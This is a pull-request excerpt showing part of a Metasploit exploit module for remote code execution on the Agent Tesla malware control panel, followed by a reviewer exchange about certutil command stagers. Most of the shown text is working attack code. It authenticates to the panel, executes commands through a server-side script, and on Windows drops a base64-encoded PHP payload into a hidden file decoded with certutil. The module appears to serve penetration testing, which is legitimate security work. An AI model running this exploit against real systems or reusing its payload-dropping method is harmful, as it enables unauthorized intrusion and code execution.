modules/exploits/multi/http/agent_tesla_panel_rce.rb

```diff
@@ -0,0 +1,229 @@
+      'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', 'server_processing.php')
+    }
+    request = request.merge({ 'cookie' => cookie }) if cookie != :not_auth
+    request = request.merge({
+      'encode_params' => true,
+      'vars_get' => requested_payload
+    })
+
+    response = send_request_cgi(request)
+    return false unless response
+
+    return response if response.body
+
+    false
+  end
+
+  def auth_get_cookie
+    if datastore['USERNAME'] && datastore['PASSWORD']
+      response = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'login.php'),
+        'vars_post' => {
+          'Username' => datastore['USERNAME'],
+          'Password' => datastore['PASSWORD']
+        }
+      )
+      return :not_auth unless response
+
+      return response.get_cookies if response.redirect? && response.headers['location'] =~ /index.php/
+    end
+
+    :not_auth
+  end
+
+  def check
+    # check for login credentials couple.
+    if datastore['USERNAME'] && datastore['PASSWORD'].nil?
+      fail_with(Failure::BadConfig, 'The USERNAME option is defined but PASSWORD is not, please set PASSWORD.')
+    end
+
+    if datastore['PASSWORD'] && datastore['USERNAME'].nil?
+      fail_with(Failure::BadConfig, 'The PASSWORD option is defined but USERNAME is not, please set USERNAME.')
+    end
+
+    response = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'server_side', 'scripts', 'server_processing.php')
+    )
+
+    if response
+      if response.redirect? && response.headers['location'] =~ /login.php/
+        unless datastore['USERNAME'] && datastore['PASSWORD']
+          print_warning('Unauthenticated RCE can\'t be exploited, retry if you gain CnC credentials.')
+          return Exploit::CheckCode::Unknown
+        end
+      end
+
+      rand_str = Rex::Text.rand_text_alpha(8..16)
+      cmd_output = parse_response(execute_command("echo #{rand_str}"))
+
+      return Exploit::CheckCode::Vulnerable if cmd_output.include?(rand_str)
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    unless datastore['ForceExploit']
+      if check != Exploit::CheckCode::Vulnerable
+        fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
+      end
+      vprint_good('The target appears to be vulnerable.')
+    end
+
+    os = os_get_name
+    unless os
+      print_bad('Could not determine the targeted operating system.')
+      return Msf::Exploit::Failed
+    end
+    print_status("Targeted operating system is: #{os}")
+
+    file_name = '.' + Rex::Text.rand_text_alpha(10) + '.php'
+    case os
+    when /linux/
+      fail_with(Failure::NoTarget, "This module currently doesn't support exploiting Linux targets!")
+    when /windows/
+      cmd = "echo #{Rex::Text.encode_base64(payload.encoded)} > #{file_name}.b64 & certutil -decode #{file_name}.b64 #{file_name} & del #{file_name}.b64"
```

Comment:
Can the `certutil` command stager be used in place of this?

Reply:
Futher inspection of this using the info at https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers#certutil-command-stager---windows-only initially looks good, but if you read the last line it seems to suggest that one would have to set the `Platform` to a value of `win`, which is not something we can do with this exploit as we need it set to `php` so the module knows to use PHP payloads rather.

Good idea though, just unfortunately might not work in this specific scenario.